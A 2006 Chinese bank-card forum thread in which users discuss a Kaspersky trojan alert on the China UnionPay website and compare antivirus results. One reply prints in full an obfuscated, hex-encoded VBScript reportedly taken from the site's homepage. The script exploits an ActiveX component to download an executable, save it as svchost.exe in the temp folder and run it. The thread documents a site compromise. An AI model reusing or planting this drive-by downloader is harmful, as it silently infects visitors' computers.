【招商银行信用卡】网友提问:
[求助]有事要登录银联官网,但卡巴报警有木马
我电脑所装的防毒软件为卡巴互联网6套装。多日来连续登录银联官方网站www.chinaunionpay.com,,卡巴斯基均报警有“木马改”病毒具体报警信息为:木马程序(修改)Trojan-Downloader.VBS.Small.bo,该文件不可清除。为此我咨询了银联客服,但客服给的回复”他的登录一切正常,然后就不理睬了“,不知网友可有碰到类似情况,难道是我的卡巴太敏感了?也请有装卡巴互联网套装的网友们试一下,或者安装其他防毒软件和防火墙的朋友们试一下。
卡友回复:
<script language="VBScript">
S="0D0A202020206F6E206572726F7220726573756D65206E6578740D0A0D0A646C203D2022687474703A2F2F7777772E6368696E61756E696F6E7061792E636F6D2F736E702F696D616765732F66726565646F6D2E657865220D0A202020206A313D22636C7369643A220D0A202020206A323D2242443936433535362D220D0A202020206A333D22363541332D220D0A202020206A343D22313144302D220D0A202020206A353D22393833412D220D0A202020206A363D22303043303446433239453336220D0A202020206A373D6A31266A32266A33266A34266A35266A360D0A20202020536574206466203D20646F63756D656E742E637265617465456C656D656E7428226F626A65637422290D0A2020202064662E7365744174747269627574652022636C6173736964222C206A370D0A2020202062343D224D69220D0A2020202062353D226372220D0A2020202062363D226F220D0A2020202062373D22736F6674220D0A2020202062333D2275220D0A2020202062383D222E58220D0A2020202062393D224D220D0A202020206231303D224C220D0A202020206231313D2248220D0A202020206231323D2254220D0A202020206231333D2254220D0A202020206231343D2250220D0A20202020737472623D623426623526623626623726623826623926623130266231312662313226623133266231340D0A202020205365742078203D2064662E4372656174654F626A65637428737472622C2222290D0A2020202061343D2241220D0A2020202061353D2264220D0A2020202061363D226F220D0A2020202061373D2264220D0A2020202061383D2262220D0A2020202061393D222E220D0A202020206131303D2253220D0A202020206131313D2274220D0A202020206131323D2272220D0A202020206131333D2265220D0A202020206131343D2261220D0A202020206131353D226D220D0A20202020737472643D61342661352661362661372661382661392661313026613131266131322661313326613134266131350D0A20202020736574205353203D2064662E6372656174656F626A65637428737472642C2222290D0A2020202053532E74797065203D20310D0A2020202066343D2247220D0A2020202066353D2245220D0A2020202066363D2254220D0A20202020737472653D66342666352666360D0A20202020782E4F70656E20737472652C20646C2C2046616C73650D0A20202020782E53656E640D0A20202020666E616D65313D22737663686F73742E657865220D0A202020207365742046203D2064662E6372656174656F626A6563742822536372697074696E672E46696C6553797374656D4F626A656374222C2222290D0A20202020746D70323D320D0A2020202073657420746D70203D20462E4765745370656369616C466F6C64657228746D7032290D0A2020202053532E6F70656E0D0A20202020666E616D65313D20462E4275696C645061746828746D702C666E616D6531290D0A2020202053532E777269746520782E726573706F6E7365426F64790D0A2020202053532E73617665746F66696C6520666E616D65312C320D0A2020202053532E636C6F73650D0A202020207A313D22536865220D0A202020207A323D226C6C2E41220D0A202020207A333D2270706C69220D0A202020207A343D22636174220D0A202020207A353D22696F220D0A202020207A363D226E220D0A202020207A7A3D7A31267A32267A33267A34267A35267A360D0A202020207365742051203D2064662E6372656174656F626A656374287A7A2C2222290D0A20202020512E5368656C6C4578656375746520666E616D65312C22222C22222C226F70656E222C300D0A20202020":D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMERIC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEFT(S,4)&N:S=MID(S,5)
LOOP:EXECUTE D
</script>
卡友回复:
根据经验卡巴确实比较敏感。
卡友回复:
江民没有报警
卡友回复:
Opera
Mcafee virusScan enterprise 8
没啥反应...
卡友回复:
俺的没事,FF+Mcafee。
卡友回复:
金山无事~
卡友回复:
瑞星一切OK
卡友回复:
试了一下,卡巴的确提示有木马,诺顿、瑞星都没有提示。卡巴一向比较敏感,有时候觉得挺烦,如果对系统不熟悉的建议不要用。
卡友回复:
不够正是登录银联网站,报有木马我才小心的。好像装有卡巴在登录都会报警
[ 本帖最后由 ricky0404 于 2006-11-12 14:39 编辑 ]
卡友回复:
今天下午再次登录,没有出现警报提示,我想这应该不是卡巴敏感的问题吧?因为我没有调整个卡巴的设置,会不会前两天真是被人捆上了木马了?!
卡友回复:
二楼我贴的代码是从银联网站首页提取的,看样子不是正常代码,网页设置人员一般不会在html头加入这样的代码,否则请银联的人出来解释!
卡友回复:
看来我的判断还是正确的
卡友回复:
我的也是卡巴啊,没报警啊,不过我的是卡巴5,卡巴6不好,很烦
卡友回复:
中文首页已经好了,请测试英文首页,哈哈~
[ 本帖最后由 sbix 于 2006-11-12 19:10 编辑 ]
卡友回复:
对中文首页,今天下午是没出现问题了
卡友回复:
网银英文网页,仍是存在木马问题,中文网页已解决
卡友回复:
相对于不安全,我宁愿烦。
卡友回复:
nod32正常
卡友回复:
看来的确是有问题,现在英文版页面前面还附有二楼的代码,中文版的没了。卡巴斯基6.0有报警,病毒库到今天下午的。